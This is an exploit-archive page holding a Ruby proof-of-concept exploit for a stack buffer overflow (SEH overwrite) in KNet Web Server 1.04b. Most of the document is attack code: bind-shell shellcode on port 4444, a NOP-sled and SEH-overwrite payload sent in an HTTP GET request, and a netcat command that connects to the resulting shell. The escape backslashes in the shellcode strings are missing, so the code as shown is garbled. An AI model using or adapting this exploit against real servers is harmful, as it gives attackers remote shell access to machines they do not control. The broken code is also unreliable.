[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : KNet Web Server 1.04b - Buffer Overflow SEH
# Published : 2013-03-29
# Author :
# Previous Title : Cool PDF Image Stream Buffer Overflow
# Next Title : STUNSHELL Web Shell Remote PHP Code Execution
#!/usr/bin/ruby
# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b
# Tested on: Windows 7
require 'net/http'
require 'uri'
require 'socket'
############################################
# bind port 4444
sc_bind =
"xbdx0ex27x05xabxdaxdbxd9x74x24xf4x5ax33xc9" +
"xb1x56x83xc2x04x31x6ax0fx03x6ax01xc5xf0x57" +
"xf5x80xfbxa7x05xf3x72x42x34x21xe0x06x64xf5" +
"x62x4ax84x7ex26x7fx1fxf2xefx70xa8xb9xc9xbf" +
"x29x0cxd6x6cxe9x0exaax6ex3dxf1x93xa0x30xf0" +
"xd4xddxbaxa0x8dxaax68x55xb9xefxb0x54x6dx64" +
"x88x2ex08xbbx7cx85x13xecx2cx92x5cx14x47xfc" +
"x7cx25x84x1ex40x6cxa1xd5x32x6fx63x24xbax41" +
"x4bxebx85x6dx46xf5xc2x4axb8x80x38xa9x45x93" +
"xfaxd3x91x16x1fx73x52x80xfbx85xb7x57x8fx8a" +
"x7cx13xd7x8ex83xf0x63xaax08xf7xa3x3ax4axdc" +
"x67x66x09x7dx31xc2xfcx82x21xaaxa1x26x29x59" +
"xb6x51x70x36x7bx6cx8bxc6x13xe7xf8xf4xbcx53" +
"x97xb4x35x7ax60xbax6cx3axfex45x8ex3bxd6x81" +
"xdax6bx40x23x62xe0x90xccxb7xa7xc0x62x67x08" +
"xb1xc2xd7xe0xdbxccx08x10xe4x06x3fx16x2ax72" +
"x6cxf1x4fx84x83x5dxd9x62xc9x4dx8fx3dx65xac" +
"xf4xf5x12xcfxdexa9x8bx47x56xa4x0bx67x67xe2" +
"x38xc4xcfx65xcax06xd4x94xcdx02x7cxdexf6xc5" +
"xf6x8exb5x74x06x9bx2dx14x95x40xadx53x86xde" +
"xfax34x78x17x6exa9x23x81x8cx30xb5xeax14xef" +
"x06xf4x95x62x32xd2x85xbaxbbx5exf1x12xeax08" +
"xafxd4x44xfbx19x8fx3bx55xcdx56x70x66x8bx56" +
"x5dx10x73xe6x08x65x8cxc7xdcx61xf5x35x7dx8d" +
"x2cxfex8dxc4x6cx57x06x81xe5xe5x4bx32xd0x2a" +
"x72xb1xd0xd2x81xa9x91xd7xcex6dx4axaax5fx18" +
"x6cx19x5fx09"
###########################################
sploit = "x90" * 1234
sploit += "xFFx64x24x5C" # nseh | JMP [ESP+5C] FF6424 5C ; will jump to Shell Code at ESP+5C
sploit += "xE3x74x24x6C" # seh | Found pop esi - pop ebp - ret at 0x6C2474E3 [crtdll.dll]
sploit += "x90" * 80
sploit += sc_bind
sploit += "x90" * 80
########################################
puts "KNet Web Server - Buffer Overflow SEH Exploitrn by Myo Soe, http://yehg.net/nn"
target = ARGV[0]
def exploit(t,s)
target = 'http://' + t
sploit = s
puts "[*] Sending exploit to #{target}...n"
url = URI.parse(target)
res = Net::HTTP.start(url.host, url.port) {|http|
http.get('/' + sploit)
}
end
def connect(t)
sleep(1)
target = t
puts "[*] Opening Shell ..nn";
system("nc #{target} 4444")
end
t1=Thread.new{exploit(target,sploit)}
t2=Thread.new{connect(target)}
t1.join
t2.join